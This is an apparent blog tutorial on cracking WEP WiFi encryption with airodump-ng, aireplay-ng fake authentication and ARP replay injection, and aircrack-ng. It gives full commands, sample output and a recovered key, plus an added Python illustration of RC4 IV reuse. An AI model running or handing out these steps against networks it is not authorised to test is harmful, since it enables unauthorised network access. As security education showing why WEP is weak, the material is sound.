Hacking WEP in under 10 minutes

WEP, also known as Wired Equivalent Privacy, is a form of encryption used in early WiFi networks. While it's not recommended today, there is still a very high percentage of people using it. As with most technology, people just set it and forget it, leaving a high number of under-secured networks on the airwaves. As always, I am not recommending you try hacking your neighbors' WiFi networks. This should be done with all of your own equipment.

To start, we need to find our target network. For this we will use airodump-ng.

Run the following command to get started, replacing the interface in the command with your own.

airodump-ng wlan1

The output should look something like this:

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                     
 28:EF:01:26:46:0B  -29       19        1    0   6  54e  WEP   WEP                linksys                      
 28:EF:01:5D:43:58  -42       17        0    0   6  54e  WPA2 CCMP   PSK  NETGEAR                      
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                        
 28:EF:01:26:46:0B  28:EF:01:DB:36:A4  -57    0 - 1      0        1 linksys                                    

As you can see we have an access point using WEP with the SSID "linksys" and we also have a client attached to this access point.

For this attack to work we must have traffic in the form of an attached client. While it's possible without one, for this how-to we will be hacking WEP with a client authenticated. We will talk more about hacking WEP without an active client in another article.

First we need to start capturing packets from the access point. To do this we will filter out everything but the target access point.

airodump-ng -c 6 --bssid 28:EF:01:26:46:0B -w ./linksys.wep wlan1

The switches to this command are below.

-c = channel of the target access point
--bssid = MAC address of the target access point
-w = path and name of the capture files. I named mine "linksys.wep" as a descriptive name, but the name is irrelevant; make it whatever you want.

The output should look like this. Leave this window open and running.

CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                      
 28:EF:01:26:46:0B  -29       19        1    0   6  54e  WEP   WEP                linksys                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                        
 28:EF:01:26:46:0B  28:EF:01:DB:36:A4  -57    0 - 1      0        1 linksys                 

Now we need to fake authentication with the target router. To do this we will use aireplay-ng with the command below in a new terminal window.

aireplay-ng -1 0 -e linksys -a 28:EF:01:26:46:0B -h {adaptor MAC} wlan1

The switches to this command are below.

-1 = Attack mode 1 = fake authentication
0 = Delay between attacks
-e = ESSID of the target access point
-a = MAC address of the target access point
-h = MAC address of your adaptor (in my case wlan1)

You should get output like this telling you it was successful. 

13:54:17  Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6
13:54:17  Sending Authentication Request (Open System) [ACK]
13:54:17  Authentication successful
13:54:17  Sending Association Request [ACK]
13:54:17  Association successful :-) (AID: 1)

You will also notice your MAC address now listed as a connected client in the instance of airodump-ng you have running. If it does not show up in airodump-ng then you may have done something wrong. Try the above command again, check that the ESSID and MAC address are those of the target access point, and make sure you are using the right MAC address of your own by typing ifconfig. You need to use the MAC address of the adaptor you are using to perform the attack. If your MAC is spoofed, make sure to use the spoofed MAC.

After you run this command you need to run an ARP request re-injection attack to create as many IVs as possible. The IVs, or initialization vectors, are what make WEP so weak. WEP uses a 24-bit IV; because it is so small and transmitted in clear text, the IVs are reused, and because of that we are able to extrapolate the WEP key if enough of them are captured. Since we don't want to wait ages to collect the required number of IVs (30 to 40 thousand is what I recommend), we will use aireplay-ng to conduct an ARP request re-injection attack to make the access point start spitting out IVs.

Basically, what we are doing is listening for ARP requests and bouncing them back to the router when we see them. Each time, the router will retransmit the ARP request with a new IV. These IVs are collected in airodump-ng and can be used in aircrack-ng later.
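
The IV weakness described above, as an added example (not code from the original article or from aircrack-ng): a simplified WEP encapsulation showing that two frames sent with the same IV leak the XOR of their plaintexts, and how quickly a 24-bit IV space repeats. The key, payloads and function names are constructed for illustration, the key-ID byte is omitted, and it illustrates IV reuse only, not the PTW attack that aircrack-ng runs.

```python
import zlib
from math import ceil, log, sqrt

IV_BITS = 24  # WEP IV size, as stated in the article

def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key schedule, then keystream XORed over data."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv: bytes, key: bytes, payload: bytes) -> bytes:
    """Simplified WEP body: clear-text IV, then RC4(IV || key) over payload || CRC-32."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + rc4(iv + key, payload + icv)

def reuse_leak(frame_a: bytes, frame_b: bytes):
    """Same IV means same keystream, so the ciphertext XOR equals the plaintext XOR."""
    if frame_a[:3] != frame_b[:3]:
        return None  # different IVs: keystreams differ, nothing cancels
    return bytes(x ^ y for x, y in zip(frame_a[3:], frame_b[3:]))

def frames_until_repeat(prob: float = 0.5, bits: int = IV_BITS) -> int:
    """Birthday bound: frames with random IVs before a repeat occurs with probability prob."""
    return ceil(sqrt(2 * 2**bits * log(1 / (1 - prob))))

def seconds_to_exhaust(pps: float, bits: int = IV_BITS) -> float:
    """Time for a sequential IV counter to wrap at a given frame rate."""
    return 2**bits / pps

if __name__ == "__main__":
    key = bytes.fromhex("0102030405")  # constructed 40-bit key, not from the article
    a = wep_encrypt(b"\x00\x00\x01", key, b"constructed payload A")
    b = wep_encrypt(b"\x00\x00\x01", key, b"constructed payload B")
    print("plaintext XOR recovered without the key:", reuse_leak(a, b).hex())
    print("frames for a 50% chance of a repeated IV:", frames_until_repeat())
    print("hours to wrap the IV space at 499 pps:", seconds_to_exhaust(499) / 3600)
```

The 499 pps figure is the injection rate shown in the aireplay-ng output later in the article; the fix on the defender's side is to retire WEP for WPA2 or later, since no key length or rotation schedule changes the 24-bit IV.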

Now it's time to have some fun. Type the command below.

aireplay-ng -3 -b 28:EF:01:26:46:0B -h {adaptor} wlan1

The switches to this command are below.

-3 = Attack mode 3 = ARP Request Replay Attack
-b = MAC address of target router
-h = MAC address of your adaptor

The output here depends on how many clients are authenticated. The more traffic the better. If you only have a single client like I did, you might have to be patient, but after a minute or so the ARP requests should start flying. Here is what the output should look like.

13:57:51  Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6
Saving ARP requests in replay_arp-0520-135751.cap
You should also start airodump-ng to capture replies.
^Cad 152425 packets (got 71155 ARP requests and 40654 ACKs), sent 52101 packets...(499 pps)

I usually wait until I have about 40,000+ ACKs. The more the better. Just be patient and let airodump-ng capture all of those ARP replies; they are what contain the IVs we need.

Once you are happy with what you have, hit Ctrl+C to stop the ARP attack. At this point you can also kill airodump-ng or leave it running; it's up to you. We should have what we need already.

The final step is to run aircrack-ng against the cap file that airodump-ng created while you were doing all of this.

For that run this command. 

aircrack-ng ./linksys.wep.cap

The output of this command should give you the WEP key as it does below. 

Opening ./linksys.wep.cap
Read 239747 packets.
   #  BSSID              ESSID                     Encryption
   1  28:EF:01:26:46:0B  linksys                    WEP (58246 IVs)
Choosing first network as target.
Opening ./linksys.wep.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 58258 ivs.
                         KEY FOUND! [ F2:C7:BB:35:B9 ] 
        Decrypted correctly: 100%

And that's it. How can it get any easier than that? It took my 1.677GHz dual-core Atom netbook about 2 seconds to find the WEP key once the packets were captured. With practice this entire attack can be done in about 10 minutes or less, and that includes the time it takes to set up.

Thanks for reading and I hope you enjoyed it. Remember, this information is meant to show you the dangers of using WEP encryption; it is not intended to teach you how to hack your neighbor's router and cause trouble. Please don't use this information to hurt other people. Not only is it illegal, but it's also not very nice. ;-)

